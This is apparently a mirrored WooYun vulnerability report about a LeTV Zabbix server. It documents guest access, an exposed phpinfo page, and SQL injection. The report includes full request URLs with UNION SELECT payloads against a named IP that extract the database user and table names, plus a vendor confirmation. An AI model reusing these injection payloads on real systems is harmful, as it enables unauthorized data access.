乐视某处一处SQL注入+未授权访问

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-08: 细节已通知厂商并且等待厂商处理中
2016-05-08: 厂商已经确认,细节仅向厂商公开
2016-05-18: 细节向核心白帽子及相关领域专家公开
2016-05-28: 细节向普通白帽子公开
2016-06-07: 细节向实习白帽子公开
2016-06-22: 细节向公众公开

简要描述:

乐视某处一处注入+未授权访问

详细说明:

#1

http://115.182.92.226/zabbix/



允许访客访问



1.jpg



2.jpg



3.jpg



4.jpg



5.jpg



7.jpg



8.jpg



9.jpg



9.jpg



11.jpg





#2 注入



12.jpg



尝试注入



code 区域
http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=not+selected&module=all&local=all&groups=ALLHOSTS&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2





参数groups business local



code 区域
http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=all&module=all&local=all&groups=-Mysql%E5%BA%94%E7%94%A8%27%20union%20select%201,2,3,user(),database()%23%20and%20%27%%27=%27%&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2





13.jpg



code 区域
view-source:http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=all&module=all&local=all&groups=-Mysql%E5%BA%94%E7%94%A8%27%20union%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables%20where%20table_schema=%27zabbix%27%23%20and%20%27%%27=%27%&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2





14.jpg





#3 phpinfo

code 区域
http://115.182.92.226/phpinfo.php



15.jpg

 

漏洞证明:

 

code 区域
user:[email protected]
db:zabbix

 

修复方案:

限制guest

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-05-08 10:43

厂商回复:

感谢对乐视安全的关注,内部扫描器已经发现了该漏洞。请给我们一点时间来推进开发修复,甲方的童鞋应该都明白推进漏洞修复的难度……

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:乐视某处一处SQL注入+未授权访问 - https://www.15qq.cn/wooyun/480.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知